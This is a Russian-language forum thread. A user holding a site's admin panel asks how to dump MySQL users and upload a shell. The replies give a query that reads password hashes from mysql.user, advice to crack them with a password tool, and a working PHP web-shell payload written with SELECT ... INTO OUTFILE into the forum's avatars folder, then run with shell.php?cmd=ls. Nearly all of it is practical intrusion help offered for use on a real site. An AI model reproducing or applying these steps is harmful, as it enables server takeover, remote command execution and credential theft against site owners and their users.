Скажите плиз камынды на Mysql просто я зашёл на форум под админом но не залить шелл через смайлы немогу в моем роспряжении тока Mysql через админку вот пример я делаю запрос : SHOW OPEN TABLES мне показует Базы кокие есть а как например зделать так что бы я мог просмотреть базу Mysql и в ней user просмотреть,я еще пытался делать так : UPDATE mysql.user SET Password=PASSWORD('111') WHERE user='root' Пишет что запрос выполнен успешно но я немогу подконектить с поролем "111" что можете подсказать . P/s:Зарание блогодарен!
Почитай маны по мусклю... Какой User()? Если с рут привелегиями, то шелл можно через запрос залить...
SELECT user, password FROM mysql.user для того что бы залить шелл - нужно знать путь к форуму... посмотри, там где то в админке в ипб по моему вписывать надо его, следовательно он должен там быть а потом простенький запрос на заливку шелла... P.S.: пассы в mysql.user зашифрованные... для расшифровки юзай passwords pro...
SELECT '<?php system($_GET[cmd]); ?>' FROM mysql.user INTO OUTFILE '/usr/home/virtual/xxx/htdocs/forums/html/style_avatars/shell.php' попробуй вот так... потом иди к <forum path>./style_avatars/shell.php?cmd=ls должно вывести список файлов в каталоге...
